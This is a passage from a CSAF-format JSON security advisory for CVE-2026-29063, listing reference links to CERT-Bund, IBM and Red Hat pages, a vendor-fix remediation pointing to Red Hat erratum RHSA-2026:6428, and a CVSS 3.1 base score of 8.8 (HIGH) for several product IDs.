                    "summary": "Reference - certbundde",
                    "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0845"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://www.ibm.com/support/pages/node/7267345"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://www.ibm.com/support/pages/node/7267347"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://www.ibm.com/support/pages/node/7267351"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://www.ibm.com/support/pages/node/7267362"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-29063"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445291"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-29063"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/errata/RHSA-2026:6428"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2025-61726"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2025-61728"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2025-61729"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2025-68121"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-25639"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-26960"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-33186"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/updates/classification/"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://docs.openshift.com/container-platform/latest/observability/network_observability/network-observability-operator-release-notes.html"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6428.json"
                }
            ],
            "remediations": [
                {
                    "category": "vendor_fix",
                    "details": "For details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
                    "product_ids": [
                        "CSAFPID-5986015",
                        "CSAFPID-5986021"
                    ],
                    "restart_required": {
                        "category": "none"
                    },
                    "url": "https://access.redhat.com/errata/RHSA-2026:6428"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                        "baseScore": 8.8,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-5759791",
                        "CSAFPID-5767297",
                        "CSAFPID-5767298",
                        "CSAFPID-5767299",
                        "CSAFPID-5767900",
                        "CSAFPID-5767901",
                        "CSAFPID-5768418",
                        "CSAFPID-5768419",
                        "CSAFPID-5905823"
                    ]
                }
            ],
            "title": "CVE-2026-29063"
        }
    ]
}